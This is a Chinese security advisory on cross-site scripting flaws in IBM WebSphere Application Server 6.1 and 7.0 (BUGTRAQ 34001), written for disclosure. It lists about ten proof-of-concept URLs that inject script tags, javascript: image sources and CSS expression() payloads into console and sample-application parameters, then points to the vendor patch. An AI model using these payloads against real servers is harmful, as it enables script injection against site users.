IBM WebSphere应用服务器多个模块跨站脚本漏洞
发布日期:2009-02-26
更新日期:2009-04-01
受影响系统:IBM Websphere Application Server 7.0
IBM Websphere Application Server 6.1
不受影响系统:IBM Websphere Application Server 7.0.0.3
IBM Websphere Application Server 6.1.0.23
描述:
BUGTRAQ ID:
34001
IBM Websphere应用服务器以Java和Servlet引擎为基础,支持多种HTTP服务,可帮助用户完成从开发、发布到维护交互式的动态网站的所有工作。
Websphere应用服务器的集成解决方案控制台、PlantsByWebSphere、Dynamic Query、Application Profile等模块和/scheduler/accountreport、/scriptwssamplesei/demo等脚本没有正确地过滤用户所提交的多个参数,远程攻击者可以通过向服务器提交恶意请求执行跨站脚本攻击。
<*来源:Polyakov Alexandr (
research@dsecrg.ru)
链接:
http://marc.info/?l=bugtraq&m=123852331909988&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
http://[server]/ibm/console/<script>alert('DSecRG_XSS')</script>
http://[server]/ibm/console/<script>alert('DSecRG_XSS')</script>.jsp
http://[server]/PlantsByWebSphere/<IMG SRC="javascript:alert('DSecRG XSS')">
http://[server]/PlantsByWebSphere/<script>alert('DSecRG XSS')</script>.jsp
http://[server]/PlantsByWebSphere/servlet/AccountServlet?action=login&updating=false&userid=<script>alert('DSecRG XSS')</script>
http://[server]/PlantsByWebSphere/servlet/ShoppingServlet?action=shopping&category=<script>alert('DSecRG XSS')</script>
http://[server]/DynamicQuery/EmployeeFinderWeb/EmployeeFinder.jsp?query=</textarea><script>alert('DSecRG XSS')</script>
http://[server]/ApplicationProfileSample/servlet/AccountManagementServlet?accountNumberToBeCreated="><IMG/SRC=javascript:alert('DSecRG_XSS')>
http://[server]/ApplicationProfileSample/servlet/AccountManagementServlet?balance="STYLE="xss:expression(alert('DSecRG XSS'))
http://[server]/ApplicationProfileSample/servlet/AccountManagementServlet?minibalance="><script>alert('DSecRG XSS')</script>
建议:
厂商补丁:
IBM
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www-01.ibm.com/support/docview.wss?uid=swg1PK81212浏览次数:3050
严重程度:0(网友投票)
